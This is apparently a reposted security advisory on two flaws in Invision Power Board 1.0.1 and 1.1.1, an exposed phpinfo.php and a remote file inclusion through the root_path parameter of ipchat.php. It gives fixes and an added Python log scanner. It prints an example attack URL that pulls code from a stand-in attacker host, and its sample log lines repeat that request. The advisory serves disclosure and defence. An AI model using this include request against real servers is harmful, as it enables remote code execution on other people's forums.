Tuesday, February 15, 2011

Security vulnerabilities in IBF 1.01 and 1.1.1

Precondition: the phpinfo.php file has not been deleted and the ipchat.php file has been added!
Invision Power Board
Information: Language: PHP Website: http://www.invisionboard.com
Version: 1.0.1 Problem: phpinfo()
Version: 1.1.1 Problem: File inclusion

Details: Invision Power Board is a full-featured forum that includes an admin section, rights management (moderators...), a member section, a member list, a help file, profile display and management, a messenger, management of "friends", ...

Version 1.0.1 contains a fairly classic flaw: the output of phpinfo() is displayed to everyone. That output contains a cross-site scripting flaw and reveals a great deal of information about the machine, the server and the PHP configuration. The code is in the file phpinfo.php:

<?php
phpinfo();
?>

It can be reached simply with a URL of the form http://[target]/phpinfo.php.

In the latest version of this forum as of this date, 1.1.1, a new file appears: ipchat.php. The first line of code in this file is:

require $root_path."conf_global.php";

This code is a flaw only if register_globals=ON. If the configuration is "favorable" to the hacker, a file external to the server can be included and executed as PHP code in ipchat.php, by the server and with its rights and restrictions. For example, the URL http://[target]/ipchat.php?root_path=http://[attacker]/ will include and execute the file http://[attacker]/conf_global.php in http://[target]/ipchat.php.


Solutions: For version 1.0.1, simply remove the file phpinfo.php.

For version 1.1.1, it is enough to add the following as the first line of code in the file ipchat.php: $root_path = "./";

Patches can be found on http://www.phpsecure.org.
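To check whether either problem has already been probed on a forum, the web server's access log can be searched for the two request shapes described above. The following is an added example, not part of the original advisory: it assumes an Apache-style access log, and the function names, labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request target and status from an Apache-style access-log line.
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A scheme prefix means the include path points at another host.
REMOTE_RE = re.compile(r"(?:https?|ftp)://", re.IGNORECASE)

def php_name(name):
    # PHP rewrites dots and spaces in incoming variable names to
    # underscores, so "root.path" also ends up as $root_path.
    return name.lstrip(" ").replace(".", "_").replace(" ", "_")

def classify(line):
    """Return a finding label for one log line, or None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    script = unquote(url.path).rsplit("/", 1)[-1].lower()
    if script == "phpinfo.php" and m.group("status") == "200":
        return "phpinfo-exposed"
    if script == "ipchat.php":
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if php_name(name) == "root_path":
                if REMOTE_RE.match(value):
                    return "remote-include-attempt"
                return "root_path-override"
    return None

def scan(lines):
    """Return (line_number, label) for every flagged line."""
    numbered = enumerate(lines, start=1)
    return [(n, label) for n, line in numbered if (label := classify(line))]

# Constructed sample log; addresses and host names are documentation values.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Feb/2003:10:00:01 +0100] "GET /forum/index.php HTTP/1.0" 200 5120',
    '192.0.2.44 - - [27/Feb/2003:10:02:11 +0100] "GET /forum/phpinfo.php HTTP/1.0" 200 40211',
    '192.0.2.44 - - [27/Feb/2003:10:02:30 +0100] "GET /forum/ipchat.php?root_path=http://attacker.example/ HTTP/1.0" 200 312',
    '192.0.2.45 - - [27/Feb/2003:10:05:02 +0100] "GET /forum/ipchat.php?root.path=hTTp%3A%2F%2Fattacker.example%2F HTTP/1.0" 200 312',
    '192.0.2.46 - - [27/Feb/2003:10:06:40 +0100] "GET /forum/ipchat.php?root_path=../ HTTP/1.0" 200 298',
    '192.0.2.47 - - [27/Feb/2003:10:07:15 +0100] "GET /forum/phpinfo.php HTTP/1.0" 404 210',
    '192.0.2.48 - - [27/Feb/2003:10:08:00 +0100] "GET /forum/ipchat.php HTTP/1.0" 200 2980',
]

if __name__ == "__main__":
    for number, label in scan(SAMPLE_LOG):
        print(number, label)
```

An access log records only the query string; with register_globals=ON the same variable can also be set from POST data or a cookie, which this check does not see.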

Credit: Author: frog-m@n E-mail: frog-man@frog-man.org Website: http://www.phpsecure.org Date: 27/02/03
      
